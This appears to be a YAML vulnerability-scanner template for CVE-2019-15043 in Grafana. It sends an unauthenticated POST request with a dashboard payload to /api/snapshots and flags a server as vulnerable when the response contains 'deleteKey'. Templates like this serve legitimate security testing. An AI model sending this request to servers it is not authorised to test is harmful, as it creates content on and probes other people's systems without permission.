26 lines
695 B
YAML
26 lines
695 B
YAML
id: CVE-2019-15043
|
|
info:
|
|
author: bing0o
|
|
name: Grafana unauthenticated API
|
|
severity: medium
|
|
tags: cve,cve2019,grafana
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /api/snapshots HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Connection: close
|
|
Content-Length: 235
|
|
Accept: */*
|
|
Accept-Language: en
|
|
Content-Type: application/json
|
|
|
|
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
|
|
|
|
matchers:
|
|
- part: body
|
|
type: word
|
|
words:
|
|
- deleteKey
|